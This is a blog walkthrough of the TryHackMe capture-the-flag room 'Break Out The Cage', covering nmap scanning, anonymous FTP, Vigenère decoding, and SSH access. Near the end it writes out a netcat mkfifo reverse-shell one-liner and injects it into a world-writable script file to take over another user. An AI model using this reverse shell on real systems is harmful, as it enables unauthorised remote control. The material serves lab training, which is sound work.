Walkthrough

[EN] Break Out The Cage WriteUp

[EN] Break Out The Cage WriteUp

Hello everyone, in this article, we will be solving the room named “Break Out The Cage” in TryHackMe together. Let’s get started right away.

Room’s Link: https://tryhackme.com/room/breakoutthecage1

Information Gathering

First of all, let’s scan the ip address given to us with nmap.

sudo nmap -A 10.10.7.223

nmap
nmap

We have 4 ports open, at the same time we see that we can log in anonymously via FTP. Let’s try.

After connecting to FTP anonymously with the help of Filezilla, we find a file called dad_tasks. Let’s download.

filezilla
filezilla

When we open the file, we see a text encrypted with base64, when we decode it, we see a text like the one below.

Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.

Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This text is encrypted with “vignere cipher”, to decrypt it first we need a key.

When looking at the open ports, we saw that port 80 was open, so a website is up. Let’s scan the directories with Gobuster.

gobuster
gobuster

When we dig through the directories a little bit, we find the directory named “auditions”, there is an audio file in it. When we open the audio file, we encounter a parasitic speech. Thinking that something is hidden inside, we open it with AudoCity and look at the spectrogram, and we reach the key of the vignere cipher.

audacity
audocity

After deciphering the password with the key, we reach our new text, it contains the password of the weston user we need.

Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.

In case I forget…. *************************************************

Action Time!

We log in to SSH as the user named “weston” with the above password.

ssh [email protected]

Now that we’re logged in, let’s look for the files belonging to cage.

find / -user cage 2> /dev/null

The file “/opt/.dads_scripts/spread_the_quotes.py” caught my attention, let’s take a look at its contents. It has a python script in it, and when I look at its permissions, I see that everyone has the authority to change the file, which is ideal for adding a reverse shell.

terminal1
terminal1

With this command, we added our reverse shell to the quotes file.

cd /opt/.dads_scripts/.files

echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes

And we are in! Let’s read the user flag.

cat Super_Duper_Checklist

user.txt
user.txt

Stay tuned for more content!

 

Çağrı Ali Ceylan

Merhaba, ben Çağrı Ali CEYLAN. Kartal Anadolu İmam Hatip Lisesi'nde eğitim görmekteyim. Veri tabanı, C programlama dilleri ve Siber Güvenlik ile ilgileniyorum.

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu